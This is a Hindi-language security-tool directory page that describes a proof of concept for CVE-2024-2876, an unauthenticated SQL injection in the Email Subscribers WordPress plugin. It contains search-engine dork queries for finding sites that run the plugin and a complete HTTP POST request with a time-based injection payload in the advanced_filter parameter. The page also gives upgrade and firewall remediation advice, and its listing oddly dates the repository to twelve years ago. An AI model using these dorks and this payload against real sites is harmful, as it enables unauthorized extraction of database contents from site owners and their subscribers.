Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2876 — CVE-2024-2876 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो Email Subscribers WordPress प्लगइन में एक अनऑथेंटिकेटेड SQL इंजेक्शन है, जिसमें dork क्वेरीज़ और एक कार्यशील exploit अनुरोध शामिल है। | Kitploit
उपकरण/GitHubGitHub/babydessy/cve-2024-2876
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbabydessy/cve-2024-2876

CVE-2024-2876

CVE-2024-2876 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो Email Subscribers WordPress प्लगइन में एक अनऑथेंटिकेटेड SQL इंजेक्शन है, जिसमें dork क्वेरीज़ और एक कार्यशील exploit अनुरोध शामिल है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2876

भेद्यता का विवरण:

WordPress और WooCommerce के लिए Icegram Express द्वारा Email Subscribers – Email Marketing, Newsletters, Automation प्लगइन, सभी संस्करणों में 5.7.14 तक और उस सहित, 'IG_ES_Subscribers_Query' क्लास के 'run' फ़ंक्शन के माध्यम से SQL Injection के प्रति संवेदनशील है, क्योंकि उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त escaping है और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी का अभाव है। यह अनधिकृत हमलावरों के लिए संभव बनाता है कि वे पहले से मौजूद क्वेरीज़ में अतिरिक्त SQL क्वेरीज़ जोड़ सकें, जिनका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#इसे कैसे ठीक करें? चूंकि 5.7.14 तक के सभी संस्करणों में CVE का पता चला था, उपयोगकर्ताओं के लिए यह अनुशंसित है कि वे Email Subscribers by Icegram Express प्लग-इन को संस्करण 5.7.15 (या नवीनतम रिलीज़ 5.7.19) में अपग्रेड करें। Patchstack उपयोगकर्ताओं के पास विशेष रूप से संवेदनशील प्लगइन्स के लिए स्वचालित अपडेट सक्षम करने का विकल्प है। सुरक्षा की एक अतिरिक्त परत के रूप में WAF/WAAP समाधान लागू करें। ऐसे समाधानों का लाभ यह है कि भले ही भेद्यता नई और अज्ञात (0-day) हो, यह शोषण पैटर्न और तकनीकों का पता लगाकर हमलों को रोक सकता है।

#संसाधन: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

टूल डाउनलोड करें